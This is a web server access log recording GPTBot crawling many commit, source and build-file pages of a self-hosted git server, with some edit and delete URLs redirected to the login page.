+[17/Feb/2026:17:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:17:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14745] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:13:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14743] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14744] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14745] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14750] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:13:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19751] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" +[17/Feb/2026:17:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" +[17/Feb/2026:17:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" +[17/Feb/2026:17:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" +[17/Feb/2026:17:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" +[17/Feb/2026:17:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" +[17/Feb/2026:17:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py?display=source" [Client 74.7.227.38] [Length 11531] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" +[17/Feb/2026:17:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19755] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" +[17/Feb/2026:17:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" +[17/Feb/2026:17:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19751] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" +[17/Feb/2026:17:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19749] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" +[17/Feb/2026:17:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19758] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" +[17/Feb/2026:17:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19750] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" +[17/Feb/2026:17:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" +[17/Feb/2026:17:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19752] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:17:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19748] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" +[17/Feb/2026:17:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19754] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" +[17/Feb/2026:17:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19723] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" +[17/Feb/2026:17:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19750] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" +[17/Feb/2026:17:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19749] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" +[17/Feb/2026:17:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" +[17/Feb/2026:17:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19759] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" +[17/Feb/2026:17:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" +[17/Feb/2026:17:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" +[17/Feb/2026:17:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19754] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" +[17/Feb/2026:17:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" +[17/Feb/2026:17:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" +[17/Feb/2026:17:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:13:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11053] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11551] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11093] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 